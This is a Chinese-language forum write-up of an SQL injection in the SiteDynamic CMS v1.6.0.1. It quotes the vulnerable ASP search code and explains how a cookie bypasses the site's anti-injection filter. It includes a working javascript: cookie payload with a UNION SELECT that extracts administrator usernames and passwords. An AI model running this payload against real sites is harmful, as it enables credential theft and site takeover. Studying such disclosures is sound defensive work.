文/My5t3ry
SiteDynamic企业网站管理系统 v1.6.0.1我就不多说了,用的站也不多,帮朋友挖的洞,论坛上熙雅就发过它用的fckeditor编辑器的上传漏洞。废话不多说,看代码:
001// /page/default.asp 5-122行
002
003
004 <%
005 pageID=strCLng(Trim(Request("pageID")))
006 ID=strCLng(Trim(Request("ID")))
007
008 If isNumeric(pageID) = False Then
009 FoundErr=True
010 Message=Message & "<li>参数错误!</li>"
011 End If
012
013 if FoundErr<>True then
014
015 if ID=0 then
016
017 If pageID<>0 Then
018 set rs=server.CreateObject("adodb.recordset")
019 sql="Select * from db_channel where pageID="&pageID
020 rs.open sql,conn,1,1
021 pageName=rs("pageName")
022 description=rs("description")
023 keywords=rs("keywords")
024 pic=rs("pic")
025 link=rs("link")
026 PageMode=rs("PageMode")
027 PageAmount=rs("PageAmount")
028 PageLine=rs("PageLine")
029 intro=rs("intro")
030
031 If Not rs.Eof Then
032 if rs("pageID")>0 then
033 if rs("ChiID")>0 then
034 strChiID=""
035 set strRs=conn.execute("select pageID from db_channel where ParentID=" & rs("pageID") & " or ParentPath like '" & rs("ParentPath") & "," & rs("pageID") & ",%'")
036
037 do while not strRs.eof
038 if strChiID="" then
039 strChiID=strRs(0)
040 else
041 strChiID=strChiID & "," & strRs(0)
042 end if
043 strRs.movenext
044 loop
045 else
046 strChiID=pageID
047 end if
048 end if
049 end If
050 rs.close
051 set rs=nothing
052
053 sql="select * from db_page Where pageID in ("&strChiID&")"
054 Else
055 sql="select * from db_page where 1=1"
056 End If
057 else
058 sql="select * from db_page where ID="&ID&""
059 End if
060
061 if not (Trim(Request("keyword"))="" or isempty(Trim(Request("keyword"))) ) then
062 sql=sql&" and (title like '%" & Trim(Request("keyword")) & "%' or content like '%" & Trim(Request("keyword")) & "%')" //bugs
063 end if
064
065 sql=sql&" order by dateandtime desc"
066 'response.write sql
067 'response.end
068 set rs=server.CreateObject("adodb.recordset")
069 rs.open sql,conn,1,1
070
071 if ID<>0 then
072 if Trim(rs("PageMode"))=4 then
073 response.redirect Trim(rs("URL"))
074 end if
075 '文件类型
076 if Trim(rs("PageMode"))=3 then
077 filesURL=Trim(rs("files"))
078 If filesURL = "" Then
079 response.write "No data!"
080 End If
081 Call Getdownload(filesURL)
082 end if
083
084 srtTitle=Trim(rs("Title"))
085 srtPageID=Trim(rs("pageID"))
086 description=rs("description")
087 keywords=rs("keywords")
088 end if
089
090 sub getTitle()
091 if pageID=0 and ID=0 then
092 response.write "全文检索"
093 elseif pageID<>0 then
094 response.write ""&pageName&""
095 elseif ID<>0 then
096 response.write "" & srtTitle & ""
097 end if
098 end sub
099
100 sub getadoTitle()
101 if pageID=0 and ID=0 then
102 response.write "全文检索"
103 elseif pageID<>0 then
104 response.write ""&pageName&""
105 elseif ID<>0 then
106 doPageID=rs("PageID")
107 set doRs=server.CreateObject("adodb.recordset")
108 Set doRs=conn.Execute("Select * From db_channel Where pageID="&doPageID)
109 response.write "" & Trim(doRs("pageName")) & ""
110 end if
111 end sub
112
113 sub getLocation()
114 if pageID=0 and ID=0 then
115 response.write "->>全文检索"
116 elseif ID<>0 then
117 call Nav(srtPageID)
118 else
119 call Nav(pageID)
120 end if
121 end sub
这套系统包含了防注系统,但只检测request.QueryString,request.form ,上面代码中keyword是通过request()获取的,所以可以用cookies来绕过防注。
利用代码
javascript:alert(document.cookie="keyword=" + escape("a%') union select 1,2,3,username&chr(124)&Password,5,6,7,8,9,0,1,2,3,4,5,6 from db_system union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6 from db_page where 1=2 and (title like '%a"));location.href="/page/Default.asp?pageID=0";
漏洞很简单,没什么好说的,要说的一点就是很多朋友遇到搜索型的注入都是直接盲注了,其实只要闭合的好,还是可以使用union的。
PS:重点在于利用的技巧 。。注入语句的写法
